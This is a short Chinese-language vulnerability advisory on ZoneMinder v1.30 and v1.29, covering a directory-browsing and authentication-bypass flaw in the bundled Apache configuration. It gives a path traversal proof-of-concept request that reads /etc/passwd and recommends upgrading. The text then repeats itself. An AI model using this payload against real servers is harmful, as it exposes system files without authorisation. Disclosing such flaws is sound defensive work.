漏洞描述:
ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。
复现过程:
1.访问ip:port
2.构造poc
/?view=file&path=/../../../../../etc/passwd
修复建议:
升级版本。
ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。
1.访问ip:port
2.构造poc
/?view=file&path=/../../../../../etc/passwd
升级版本。